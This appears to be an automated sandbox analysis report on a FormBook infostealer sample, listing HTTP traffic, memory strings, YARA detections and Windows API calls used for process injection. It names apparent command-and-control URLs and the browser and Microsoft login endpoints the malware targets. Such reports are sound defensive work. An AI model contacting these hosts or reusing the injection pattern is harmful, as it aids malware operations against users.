                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 11:57:56 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 26 Jul 2024 11:58:15 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requ
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 26 Jul 2024 11:58:27 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requ
                  Source: fgebfePlJm.exe, 00000009.00000002.3492695958.0000000000B67000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.accessoriestechbd.com
                  Source: fgebfePlJm.exe, 00000009.00000002.3492695958.0000000000B67000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.accessoriestechbd.com/5pdf/
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757032878.0000000005630000.00000004.00000020.00020000.00000000.sdmp, dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: mcbuilder.exe, 00000008.00000002.3493562644.00000000047CA000.00000004.10000000.00040000.00000000.sdmp, fgebfePlJm.exe, 00000009.00000002.3493242754.000000000320A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://asymtos.ai/34b9/?bPD=W6RiSnxSk7sWUyAWv8iRSiD0PbjPvpVwUriP78iMWJLg9pjq2qbXqPDPIc9Rf4jTN/ETyga
                  Source: mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: mcbuilder.exe, 00000008.00000002.3492126956.000000000336E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                  Source: mcbuilder.exe, 00000008.00000002.3492126956.000000000336E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                  Source: mcbuilder.exe, 00000008.00000002.3492126956.000000000336E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                  Source: mcbuilder.exe, 00000008.00000002.3492126956.000000000336E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033F
                  Source: mcbuilder.exe, 00000008.00000002.3492126956.000000000336E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                  Source: mcbuilder.exe, 00000008.00000002.3492126956.000000000336E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                  Source: mcbuilder.exe, 00000008.00000003.2580416916.0000000008245000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                  Source: mcbuilder.exe, 00000008.00000002.3493562644.00000000044A6000.00000004.10000000.00040000.00000000.sdmp, fgebfePlJm.exe, 00000009.00000002.3493242754.0000000002EE6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bosonserver.net/x10g/?bPD=AtIpZIbrclbIO3wVVorP/
                  Source: mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                  E-Banking Fraud

                  barindex
                  Yara detected FormBook
                  Source: Yara matchFile source: 3.2.dGHiTqj3AB.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.dGHiTqj3AB.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3492992987.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2264611220.0000000001770000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3492695958.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3492771051.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.3492876557.0000000002DD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2266277321.0000000002810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 3.2.dGHiTqj3AB.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 3.2.dGHiTqj3AB.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000008.00000002.3492992987.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000003.00000002.2264611220.0000000001770000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000009.00000002.3492695958.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000008.00000002.3492771051.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000007.00000002.3492876557.0000000002DD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000003.00000002.2266277321.0000000002810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0042BEE3 NtClose,3_2_0042BEE3
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942B60 NtClose,LdrInitializeThunk,3_2_01942B60
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01942DF0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01942C70
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019435C0 NtCreateMutant,LdrInitializeThunk,3_2_019435C0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01944340 NtSetContextThread,3_2_01944340
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01944650 NtSuspendThread,3_2_01944650
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942B80 NtQueryInformationFile,3_2_01942B80
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942BA0 NtEnumerateValueKey,3_2_01942BA0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942BF0 NtAllocateVirtualMemory,3_2_01942BF0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942BE0 NtQueryValueKey,3_2_01942BE0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942AB0 NtWaitForSingleObject,3_2_01942AB0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942AD0 NtReadFile,3_2_01942AD0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942AF0 NtWriteFile,3_2_01942AF0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942DB0 NtEnumerateKey,3_2_01942DB0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942DD0 NtDelayExecution,3_2_01942DD0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942D10 NtMapViewOfSection,3_2_01942D10
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942D00 NtSetInformationFile,3_2_01942D00
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942D30 NtUnmapViewOfSection,3_2_01942D30
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942CA0 NtQueryInformationToken,3_2_01942CA0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942CC0 NtQueryVirtualMemory,3_2_01942CC0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942CF0 NtOpenProcess,3_2_01942CF0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942C00 NtQueryInformationProcess,3_2_01942C00
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942C60 NtCreateKey,3_2_01942C60
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942F90 NtProtectVirtualMemory,3_2_01942F90
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942FB0 NtResumeThread,3_2_01942FB0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942FA0 NtQuerySection,3_2_01942FA0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942FE0 NtCreateFile,3_2_01942FE0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942F30 NtCreateSection,3_2_01942F30
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942F60 NtCreateProcessEx,3_2_01942F60
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942E80 NtReadVirtualMemory,3_2_01942E80
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942EA0 NtAdjustPrivilegesToken,3_2_01942EA0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942EE0 NtQueueApcThread,3_2_01942EE0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942E30 NtWriteVirtualMemory,3_2_01942E30
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01943090 NtSetValueKey,3_2_01943090
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01943010 NtOpenDirectoryObject,3_2_01943010
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019439B0 NtGetContextThread,3_2_019439B0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01943D10 NtOpenProcessToken,3_2_01943D10
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01943D70 NtOpenThread,3_2_01943D70
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D4340 NtSetContextThread,LdrInitializeThunk,8_2_038D4340
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D4650 NtSuspendThread,LdrInitializeThunk,8_2_038D4650
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D2BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_038D2BA0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D2BE0 NtQueryValueKey,LdrInitializeThunk,8_2_038D2BE0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_038D2BF0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D2B60 NtClose,LdrInitializeThunk,8_2_038D2B60
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D2AD0 NtReadFile,LdrInitializeThunk,8_2_038D2AD0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D2AF0 NtWriteFile,LdrInitializeThunk,8_2_038D2AF0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D2FB0 NtResumeThread,LdrInitializeThunk,8_2_038D2FB0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D2FE0 NtCreateFile,LdrInitializeThunk,8_2_038D2FE0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D2F30 NtCreateSection,LdrInitializeThunk,8_2_038D2F30
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D2E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_038D2E80
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D2EE0 NtQueueApcThread,LdrInitializeThunk,8_2_038D2EE0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D2DD0 NtDelayExecution,LdrInitializeThunk,8_2_038D2DD0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D2DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_038D2DF0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038D2D10 NtMapViewOfSection,LdrInitializeThunk,8_2_038D2D10
